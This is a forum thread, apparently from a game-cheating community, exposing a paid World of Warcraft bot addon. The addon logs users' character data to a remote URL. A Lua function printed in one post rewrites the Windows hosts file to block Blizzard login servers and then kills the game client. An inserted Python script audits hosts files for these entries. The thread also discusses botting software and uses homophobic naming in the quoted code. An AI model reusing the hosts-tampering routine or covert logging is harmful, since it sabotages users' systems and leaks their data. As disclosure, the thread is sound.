-
Active Member
XenRotations Logging Character Information
With XenRotations being one of the more popular paid addons, felt it was only right to share this with the public.
All users of this addon should be aware that it is logging your character name and server at the following web address:
http://xenrotations.com/wp-content/wow/wow/alo.php?charname=CHARACTER_NAME&charrealm=CHARACTER_REALM&username=XXXX
The addon also contains a function to add the following lines to your HOSTS file, although it's unclear at this time if it's called anywhere.
127.0.0.1 ip-184-168-42-232.ip.secureserver.net
127.0.0.1 worldofwarcraft.com
127.0.0.1 us.logon.worldofwarcraft.com
127.0.0.1 eu.logon.worldofwarcraft.com
127.0.0.1 logon.worldofwarcraft.com
127.0.0.1 us.battle.net
127.0.0.1 eu.battle.net
Last edited by outlawfosho; 12-13-2016 at 05:50 PM.
-
Do you have a copy of their software? I'd love to poke at it.
-
Active Member
Originally Posted by SniffingPickles
Do you have a copy of their software? I'd love to poke at it.
Here you go, TinyUpload.com - best file hosting solution, with no limits, totaly free
VirusTotal: 1/55 Antivirus scan for ef46bff38aa1ad508188aed89244f83242af61b4b657aec06f86950da1f0eb41 at 2016-12-14 03:02:43 UTC - VirusTotal
While that 1/55 is probably a false positive, I have not poked around the loader at all so please take proper precautions when running anything. As far as the DLL, at first glance it checks for Firehack.dll and if found it loads the addon by calling one of FH's exported functions.
-
Active Member
Also should add that I have the actual addon source, dumped it to further investigate when I saw that character information was being logged. Can provide it to any reputable member to confirm, just hit me up.
-
Code:
function _isPlayerGay()
local gay = WriteFile
local notgay = ReadFile
local gayness = notgay("C:\\Windows\\System32\\drivers\\etc\\hоsts");
local doitinthebutt = gayness .. "\n" .. "\n" .. "127.0.0.1 ip-184-168-42-232.ip.secureserver.net" .. "\n" .. "127.0.0.1 worldofwarcraft.com" .. "\n" .. "127.0.0.1 us.logon.worldofwarcraft.com" .. "\n" .. "127.0.0.1 eu.logon.worldofwarcraft.com" .. "\n" .. "127.0.0.1 logon.worldofwarcraft.com" .. "\n" .. "127.0.0.1 us.battle.net" .. "\n" .. "127.0.0.1 eu.battle.net";
gay("C:\\Windows\\System32\\drivers\\etc\\hоsts",doitinthebutt);
C_Timer.After(3,function() TerminateClient() end);
if imsupergay then return true; end
end
Disgusting.
-
It appears to be not in use currently, but
Code:
function ReadFile (Path)
function WriteFile (Path, Contents[, Append])
are actual existing functions supplied by FireHack.
I guess what stopped them is that Windows requires admin rights to write the hosts file.
Considering the binary is linked with debugging information from someone using the inbuilt Administrator user account for some stupid reason, they actually thought this would work.
(C:\Users\Administrator\Documents\!Everything\dll\trunk\x64\Release\xenRotations.pdb)
Last edited by maclone; 12-15-2016 at 04:15 AM.
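A defender-side check for the hosts entries listed in the first post and assembled by the function quoted above, as an added example that is not part of the original thread: it reports every hosts-file line that overrides one of those names. It goes slightly beyond the thread by also flagging non-loopback redirects; `audit_hosts`, `WATCHED` and the sample file are constructed for illustration.

```python
import ipaddress
import sys

# Hostnames taken from the hosts entries quoted in this thread.
WATCHED = {
    "ip-184-168-42-232.ip.secureserver.net", "worldofwarcraft.com",
    "us.logon.worldofwarcraft.com", "eu.logon.worldofwarcraft.com",
    "logon.worldofwarcraft.com", "us.battle.net", "eu.battle.net",
}

def audit_hosts(text):
    """Return (line_no, address, hostname, kind) for every override of a watched name."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()  # drop comments, split on whitespace
        if len(fields) < 2:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an IP address, so not a hosts entry
        # Loopback or 0.0.0.0 blocks the name; any other address redirects it.
        kind = "blackhole" if addr.is_loopback or addr.is_unspecified else "redirect"
        for name in fields[1:]:  # one line may map several names
            name = name.lower().rstrip(".")
            if name in WATCHED:
                findings.append((line_no, fields[0], name, kind))
    return findings

# Constructed sample hosts file (not taken from any real machine).
SAMPLE = "\n".join([
    "# Constructed sample hosts file",
    "127.0.0.1       localhost",
    "127.0.0.1 worldofwarcraft.com",
    "127.0.0.1 US.Battle.Net eu.battle.net  # two names on one line",
    "# 127.0.0.1 logon.worldofwarcraft.com",
    "0.0.0.0 eu.logon.worldofwarcraft.com",
    "203.0.113.7 us.logon.worldofwarcraft.com",
])

if __name__ == "__main__":
    # Pass a hosts file path as the first argument; defaults to the sample.
    text = SAMPLE
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    for line_no, addr, name, kind in audit_hosts(text):
        print(f"line {line_no}: {name} -> {addr} ({kind})")
```

Commented-out entries and the ordinary `localhost` mapping are ignored, so a clean hosts file produces no output.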
-
Active Member
Original work seems to be dying out completely, it's really quite sad. The core of the addon is 99% similar to what at least 3 other people I've personally witnessed are selling as their own product. This particular one has an added drawing library that someone else coded (lol) and "updated" rotations but I'm curious as to who the original author is. Seems like there are only a few real developers left in the scene and the rest is just a giant pool of copy & paste money grabs.
To the real developers out there who may read this, your work is very much appreciated.
Last edited by outlawfosho; 12-15-2016 at 03:45 PM.
-
Anything with a 1 time payment should be a red flag.
-
Member
This has been a project me and a few friends have been working on for a couple years. We must have been messing around with readfile / writefile functions at some point seeing if it could write to hosts. I don't call that function anywhere, though I did add logs of charname / realm, I don't / haven't used them for anything. Perhaps I was trying to see the results (rating increase) of people using my routines? No malicious intent, though I've messed around with FireHack's api seeing what is possible. Is that not normal? Am I a special snowflake? ;( p.s, Thanks for not publicly dumping the source op. Appreciate it. Anyone that knows what they're doing feel free to take a good thorough look.
Last edited by ArenaFarm; 12-20-2016 at 03:46 PM.
-
Originally Posted by Xentrocity
This has been a project me and a few friends have been working on for a couple years. We must have been messing around with readfile / writefile functions at some point seeing if it could write to hosts. I don't call that function anywhere, though I did add logs of charname / realm, I don't / haven't used them for anything. Perhaps I was trying to see the results (rating increase) of people using my routines? No malicious intent, though I've messed around with FireHack's api seeing what is possible. Is that not normal? Am I a special snowflake? ;( p.s, Thanks for not publicly dumping the source op. Appreciate it. Anyone that knows what they're doing feel free to take a good thorough look.
You logged your users' data, regardless if there was no malicious intent, you shouldn't do this. People trusted you with their money and personal information. What if someone got into your database, saw your logged characters and released it? Mayhem would ensue of people "cheating" the game (it's a double edged sword, I don't support people botting pvp, but I also support their ability to do so). Not to mention you had a function, that if executed, would cause the player to not be able to play wow unless extensive research and review of host files was done (yes, I understand writing to host files requires admin rights, nevertheless tisk tisk).
You had dirty code in your software to which you charged people an arm and a leg for. I don't support you or the shady practices used in your software.
-
Member
yeah, I was about to purchase from Xen and now I am glad I didn't... Thanks Snowflake.
-
Member
epic nice from xen to log its users
-
Banned
is not very nice to log users.
-
Member
The fact that even a moderator here found the code and does not matter it is active or not active to me is almost a bannable offense.
Xen, even if you did not put that code in I'd be stripping that out ASAP and doing a public apology if you want to save face at all since this has been linked to nearly all major discord at some point of time in passing conversation.
-
Banned
i resell 2 xen accounts less than 10$ if anybody interested
-
Banned
You can always just use the free version on SVN, it's spyware free.
Xen SVN